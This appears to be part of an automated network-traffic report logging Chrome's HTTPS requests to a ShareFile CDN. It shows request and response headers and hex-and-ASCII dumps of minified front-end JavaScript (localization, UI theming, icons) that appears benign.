                                                                                                                                                                                                                      Via: 1.1 8f20db43ba7579b7216cf908572d5054.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: tYBHiaUTQa8JRyjzXDhTSMo58mBY1umIPtCCUiAdLaI0Ez6uRkGaUw==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC15862INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6c 69 65 6e 74 64 61 73 68 62 6f 61 72 64 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6c 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 41 63 63 6f 75 6e 74 73 45 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevclientdashboard,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},l={},o={},i={},c={};return{setters:[function(e){n.AccountsEn
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 76 65 4d 69 73 73 69 6e 67 54 6f 3f 50 3d 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 74 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 74 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3a 50 2e 70 75 73 68 28 74 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 76 61 72 20 6f 3d 6b 26 26 72 21 3d 3d 70 3f 72 3a 53 3b 6c 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 3f 6c 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 65 2c 66 2c 6e 2c 6f 2c 46 2c 74 29 3a 6c 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 26 26 6c 2e 62 61 63 6b 65 6e
                                                                                                                                                                                                                      Data Ascii: his.options.saveMissingTo?P=this.languageUtils.toResolveHierarchy(t.lng||this.language):P.push(t.lng||this.language);var N=function(e,n,r){var o=k&&r!==p?r:S;l.options.missingKeyHandler?l.options.missingKeyHandler(e,f,n,o,F,t):l.backendConnector&&l.backen
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 70 4f 6e 56 61 72 69 61 62 6c 65 73 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 73 6b 69 70 4f 6e 56 61 72 69 61 62 6c 65 73 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 73 6b 69 70 4f 6e 56 61 72 69 61 62 6c 65 73 3b 72 65 74 75 72 6e 5b 7b 72 65 67 65 78 3a 74 68 69 73 2e 72 65 67 65 78 70 55 6e 65 73 63 61 70 65 2c 73 61 66 65 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 75 28 65 29 7d 7d 2c 7b 72 65 67 65 78 3a 74 68 69 73 2e 72 65 67 65 78 70 2c 73 61 66 65 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 2e 65 73 63 61 70 65 56 61 6c 75 65 3f 75 28 63 2e 65 73 63 61 70 65 28 65 29 29 3a 75 28 65 29 7d 7d 5d 2e
                                                                                                                                                                                                                      Data Ascii: pOnVariables!==undefined?r.interpolation.skipOnVariables:this.options.interpolation.skipOnVariables;return[{regex:this.regexpUnescape,safeValue:function(e){return u(e)}},{regex:this.regexp,safeValue:function(e){return c.escapeValue?u(c.escape(e)):u(e)}}].
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 70 6c 79 28 6e 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 29 29 3b 5b 22 61 64 64 52 65 73 6f 75 72 63 65 22 2c 22 61 64 64 52 65 73 6f 75 72 63 65 73 22 2c 22 61 64 64 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 22 72 65 6d 6f 76 65 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 28 6e 3d 65 2e 73 74 6f 72 65 29 5b 74 5d 2e 61 70 70 6c 79 28 6e 2c 61 72 67 75 6d 65 6e 74 73 29 2c 65 7d 7d 29 29 3b 76 61 72 20 68 3d 79 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 65 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 26 26 21 65 2e 69 6e 69 74 69 61 6c 69
                                                                                                                                                                                                                      Data Ascii: ply(n,arguments)}}));["addResource","addResources","addResourceBundle","removeResourceBundle"].forEach((function(t){e[t]=function(){var n;return(n=e.store)[t].apply(n,arguments),e}}));var h=y(),f=function(){var t=function(t,r){e.isInitialized&&!e.initiali
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 46 65 28 4f 62 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 44 65 66 61 75 6c 74 3d 22 65 6e 22 2c 65 2e 45 6e 67 6c 69 73 68 3d 22 65 6e 22 2c 65 2e 47 65 72 6d 61 6e 3d 22 64 65 22 2c 65 2e 53 70 61 6e 69 73 68 3d 22 65 73 22 2c 65 2e 46 72 65 6e 63 68 3d 22 66 72 22 2c 65 2e 49 74 61 6c 69 61 6e 3d 22 69 74
                                                                                                                                                                                                                      Data Ascii: t.getOwnPropertyDescriptors(n)):Fe(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var Pe=function(e){return e.Default="en",e.English="en",e.German="de",e.Spanish="es",e.French="fr",e.Italian="it
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 7d 29 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 31 7d 29 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 31 7d 29 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 31 7d 29 24 2f 2c 68 65 78 38 3a 2f 5e 23 3f 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 32 7d 29 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 32 7d 29 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 32 7d 29 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 32 7d 29 24 2f 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 56 2e 43 53 53 5f 55 4e 49 54 2e 65 78 65 63 28 53 74 72 69 6e 67 28 65 29 29 29 7d 76 61 72 20 4c 3d 32 2c 6b 3d 2e 31 36 2c 4f 3d 2e 30 35 2c 41 3d 2e 30 35 2c 53 3d 2e 31 35 2c 46 3d 35 2c 6a 3d 34 2c 50 3d 5b 7b 69 6e 64 65 78 3a 37 2c 6f 70 61 63 69 74 79 3a 2e 31 35 7d 2c 7b 69 6e
                                                                                                                                                                                                                      Data Ascii: })([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})$/,hex8:/^#?([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})$/};function B(e){return Boolean(V.CSS_UNIT.exec(String(e)))}var L=2,k=.16,O=.05,A=.05,S=.15,F=5,j=4,P=[{index:7,opacity:.15},{in
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 22 4d 32 30 2e 39 31 34 20 38 2e 31 38 32 63 2d 2e 31 33 39 2e 31 30 38 2d 32 2e 35 39 36 20 31 2e 34 39 32 2d 32 2e 35 39 36 20 34 2e 35 37 32 20 30 20 33 2e 35 36 31 20 33 2e 31 32 37 20 34 2e 38 32 31 20 33 2e 32 32 20 34 2e 38 35 32 2d 2e 30 31 34 2e 30 37 37 2d 2e 34 39 36 20 31 2e 37 32 36 2d 31 2e 36 34 38 20 33 2e 34 30 36 2d 31 2e 30 32 38 20 31 2e 34 37 38 2d 32 2e 31 20 32 2e 39 35 34 2d 33 2e 37 33 32 20 32 2e 39 35 34 73 2d 32 2e 30 35 32 2d 2e 39 34 38 2d 33 2e 39 33 36 2d 2e 39 34 38 63 2d 31 2e 38 33 36 20 30 2d 32 2e 34 39 2e 39 38 2d 33 2e 39 38 32 2e 39 38 2d 31 2e 34 39 33 20 30 2d 32 2e 35 33 34 2d 31 2e 33 36 38 2d 33 2e 37 33 32 2d 33 2e 30 34 38 43 33 2e 31 32 31 20 31 38 2e 39 37 37 20 32 20 31 35 2e 39 31 32 20 32 20 31 33 2e 30
                                                                                                                                                                                                                      Data Ascii: "M20.914 8.182c-.139.108-2.596 1.492-2.596 4.572 0 3.561 3.127 4.821 3.22 4.852-.014.077-.496 1.726-1.648 3.406-1.028 1.478-2.1 2.954-3.732 2.954s-2.052-.948-3.936-.948c-1.836 0-2.49.98-3.982.98-1.493 0-2.534-1.368-3.732-3.048C3.121 18.977 2 15.912 2 13.0
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 36 2e 36 35 2d 31 2e 30 38 68 39 2e 31 34 6c 2d 31 2e 39 37 33 20 31 2e 39 35 32 20 31 2e 30 34 36 20 31 2e 30 33 35 4c 32 32 20 31 38 2e 35 33 6c 2d 33 2e 37 36 2d 33 2e 37 31 39 2d 31 2e 30 34 35 20 31 2e 30 33 35 20 31 2e 39 37 33 20 31 2e 39 35 33 68 2d 39 2e 31 34 61 32 2e 35 36 20 32 2e 35 36 20 30 20 30 20 30 2d 2e 36 35 2d 31 2e 30 38 20 32 2e 36 20 32 2e 36 20 30 20 30 20 30 2d 31 2e 38 33 2d 2e 37 35 63 2d 2e 36 38 37 20 30 2d 31 2e 33 34 36 2e 32 37 2d 31 2e 38 33 31 2e 37 35 61 32 2e 35 36 20 32 2e 35 36 20 30 20 30 20 30 2d 2e 36 35 20 31 2e 30 38 48 33 2e 36 36 34 76 2d 35 2e 33 39 37 68 36 2e 34 38 38 63 2e 31 32 32 2e 34 30 34 2e 33 34 33 2e 37 37 36 2e 36 35 20 31 2e 30 38 2e 34 38 36 2e 34 38 20 31 2e 31 34 34 2e 37 35 20 31 2e 38 33 2e
                                                                                                                                                                                                                      Data Ascii: 6.65-1.08h9.14l-1.973 1.952 1.046 1.035L22 18.53l-3.76-3.719-1.045 1.035 1.973 1.953h-9.14a2.56 2.56 0 0 0-.65-1.08 2.6 2.6 0 0 0-1.83-.75c-.687 0-1.346.27-1.831.75a2.56 2.56 0 0 0-.65 1.08H3.664v-5.397h6.488c.122.404.343.776.65 1.08.486.48 1.144.75 1.83.
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 75 72 6e 20 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 22 31 65 6d 22 2c 68 65 69 67 68 74 3a 22 31 65 6d 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 32 31 20 36 2e 30 30 33 20 39 2e 30 34 34 20 31 39 20 33 20 31 32 2e 39 37 38 6c 31 2e 30 35 34 2d 31 2e 30 35 20 34 2e 39 34 33 20 34 2e 39 32 36 4c 31 39 2e 39 30 32 20 35 7a 22
                                                                                                                                                                                                                      Data Ascii: urn l.createElement("svg",{xmlns:"http://www.w3.org/2000/svg",width:"1em",height:"1em",fill:"currentColor",viewBox:"0 0 24 24"},l.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M21 6.003 9.044 19 3 12.978l1.054-1.05 4.943 4.926L19.902 5z"
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 34 2e 32 36 32 20 34 2e 39 37 36 63 30 20 2e 35 39 31 2d 2e 34 30 35 20 31 2e 31 33 38 2d 31 2e 30 39 34 20 31 2e 35 38 35 61 39 2e 36 20 39 2e 36 20 30 20 30 20 30 2d 32 2e 32 37 36 2e 37 30 33 20 36 20 36 20 30 20 30 20 30 2d 2e 35 34 33 2e 32 38 33 63 2d 2e 36 31 35 2e 31 30 31 2d 31 2e 32 37 38 2e 31 35 37 2d 31 2e 39 36 38 2e 31 35 37 2d 33 2e 32 34 38 20 30 2d 35 2e 38 38 31 2d 31 2e 32 32 31 2d 35 2e 38 38 31 2d 32 2e 37 32 38 43 32 2e 35 20 33 2e 34 37 20 35 2e 31 33 33 20 32 2e 32 35 20 38 2e 33 38 31 20 32 2e 32 35 73 35 2e 38 38 20 31 2e 32 32 20 35 2e 38 38 20 32 2e 37 32 37 4d 38 2e 33 38 20 31 34 2e 35 32 32 76 2d 2e 39 31 63 2d 31 2e 37 37 34 20 30 2d 33 2e 34 34 37 2d 2e 33 33 2d 34 2e 37 32
                                                                                                                                                                                                                      Data Ascii: :"evenodd",d:"M14.262 4.976c0 .591-.405 1.138-1.094 1.585a9.6 9.6 0 0 0-2.276.703 6 6 0 0 0-.543.283c-.615.101-1.278.157-1.968.157-3.248 0-5.881-1.221-5.881-2.728C2.5 3.47 5.133 2.25 8.381 2.25s5.88 1.22 5.88 2.727M8.38 14.522v-.91c-1.774 0-3.447-.33-4.72


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      113192.168.2.174983413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC574OUTGET /sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:45:49 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 07:16:17 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 3af85c3075e12aff72b9e148b99d6622.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: W0xWrBU6-G7GYuasjL8MK3VXaLKh8OpQqe7YDrxWlIz_rOVCLpp20w==
                                                                                                                                                                                                                      Age: 44405
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      114192.168.2.174983313.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC420OUTGET /sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 308129
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:45:49 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:21 GMT
                                                                                                                                                                                                                      ETag: "aaa88d2636dfeb090b5625da19c6583b"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 5076c8187f430eebe5e26fc594d6125a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: c95tyw8wDUndowb6Gq0G1-yOYD8qiDoq2aPgcxsgN-VZeRAGyZtmxg==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 72 6f 6a 65 63 74 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 63 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75 72
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevprojectspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},c={},s={},u={};retur
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 3d 6e 28 34 35 30 34 32 29 2c 6f 3d 2f 5e 28 28 63 68 69 6c 64 72 65 6e 7c 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 7c 6b 65 79 7c 72 65 66 7c 61 75 74 6f 46 6f 63 75 73 7c 64 65 66 61 75 6c 74 56 61 6c 75 65 7c 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 7c 69 6e 6e 65 72 48 54 4d 4c 7c 73 75 70 70 72 65 73 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 57 61 72 6e 69 6e 67 7c 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 7c 76 61 6c 75 65 4c 69 6e 6b 7c 61 62 62 72 7c 61 63 63 65 70 74 7c 61 63 63 65 70 74 43 68 61 72 73 65 74 7c 61 63 63 65 73 73 4b 65 79 7c 61 63 74 69 6f 6e 7c 61 6c 6c 6f 77 7c 61 6c 6c 6f 77 55 73 65 72 4d 65 64 69 61 7c 61 6c 6c 6f 77 50 61 79 6d 65 6e 74 52 65 71 75 65 73 74 7c
                                                                                                                                                                                                                      Data Ascii: =n(45042),o=/^((children|dangerouslySetInnerHTML|key|ref|autoFocus|defaultValue|defaultChecked|innerHTML|suppressContentEditableWarning|suppressHydrationWarning|valueLink|abbr|accept|acceptCharset|accessKey|action|allow|allowUserMedia|allowPaymentRequest|
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 20 34 70 78 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 5c 6e 5c 74 62 6f 78 2d 73 68 61 64 6f 77 3a 20 22 2c 22 3b 5c 6e 5c 74 22 2c 22 20 7b 5c 6e 5c 74 5c 74 62 6f 72 64 65 72 3a 20 75 6e 73 65 74 3b 5c 6e 5c 74 7d 5c 6e 22 5d 29 29 2c 66 2e 61 53 2e 62 6f 78 53 68 61 64 6f 77 2c 64 2e 76 41 29 2c 76 3d 28 30 2c 73 2e 5a 29 28 6d 29 28 61 7c 7c 28 61 3d 28 30 2c 63 2e 5a 29 28 5b 22 5c 6e 5c 74 70 61 64 64 69 6e 67 3a 20 38 70 78 20 22 2c 22 20 22 2c 22 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75
                                                                                                                                                                                                                      Data Ascii: r-left-width: 4px;\n\tborder-left-style: solid;\n\tbox-shadow: ",";\n\t"," {\n\t\tborder: unset;\n\t}\n"])),f.aS.boxShadow,d.vA),v=(0,s.Z)(m)(a||(a=(0,c.Z)(["\n\tpadding: 8px "," ",";\n\tborder-style: solid;\n\tborder-width: 1px;\n\tborder-top-right-radiu
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC15254INData Raw: 6f 42 6f 72 64 65 72 3a 73 2e 69 4e 2c 69 6e 66 6f 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 5f 43 2c 6d 6f 64 61 6c 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 6f 72 2c 62 6c 61 64 65 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 6f 72 2c 66 6c 79 6f 76 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 65 43 2c 6c 69 73 74 49 74 65 6d 48 6f 76 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 5a 50 2c 6c 69 73 74 49 74 65 6d 53 65 6c 65 63 74 65 64 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 76 56 2c 70 72 69 6d 61 72 79 54 65 78 74 3a 73 2e 54 69 2c 73 65 63 6f 6e 64 61 72 79 54 65 78 74 3a 73 2e 6d 4b 2c 6d 65 74 61 64 61 74 61 54 65 78 74 3a 73 2e 6d 4b 2c 62 6f 72 64 65 72 3a 73 2e 6d 4b 2c 70 72 69 6d 61 72 79 41 70 70 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 68 65 2c 70 72 69 6d
                                                                                                                                                                                                                      Data Ascii: oBorder:s.iN,infoBackground:s._C,modalBackground:s.or,bladeBackground:s.or,flyoverBackground:s.eC,listItemHoverBackground:s.ZP,listItemSelectedBackground:s.vV,primaryText:s.Ti,secondaryText:s.mK,metadataText:s.mK,border:s.mK,primaryAppBackground:s.he,prim
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC12792INData Raw: 73 46 69 6c 65 49 63 6f 6e 3a 22 47 65 6e 65 68 6d 69 67 75 6e 67 73 64 61 74 65 69 22 2c 41 75 64 69 6f 49 63 6f 6e 3a 22 41 75 64 69 6f 64 61 74 65 69 22 2c 43 6f 64 65 46 69 6c 65 49 63 6f 6e 3a 22 43 6f 64 65 64 61 74 65 69 22 2c 43 77 46 6f 72 6d 49 63 6f 6e 3a 22 46 6f 72 6d 75 6c 61 72 76 6f 72 6c 61 67 65 22 2c 43 77 54 65 6d 70 6c 61 74 65 49 63 6f 6e 3a 22 57 6f 72 6b 66 6c 6f 77 76 6f 72 6c 61 67 65 22 2c 43 77 57 6f 72 6b 66 6c 6f 77 49 63 6f 6e 3a 22 57 6f 72 6b 66 6c 6f 77 69 6e 73 74 61 6e 7a 22 2c 44 63 6d 49 63 6f 6e 3a 22 44 43 4d 2d 44 61 74 65 69 22 2c 44 77 67 49 63 6f 6e 3a 22 44 57 47 2d 44 61 74 65 69 22 2c 45 6d 61 69 6c 49 63 6f 6e 3a 22 45 2d 4d 61 69 6c 2d 44 61 74 65 69 22 2c 45 6d 70 74 79 34 30 34 49 63 6f 6e 3a 22 44 61 74
                                                                                                                                                                                                                      Data Ascii: sFileIcon:"Genehmigungsdatei",AudioIcon:"Audiodatei",CodeFileIcon:"Codedatei",CwFormIcon:"Formularvorlage",CwTemplateIcon:"Workflowvorlage",CwWorkflowIcon:"Workflowinstanz",DcmIcon:"DCM-Datei",DwgIcon:"DWG-Datei",EmailIcon:"E-Mail-Datei",Empty404Icon:"Dat
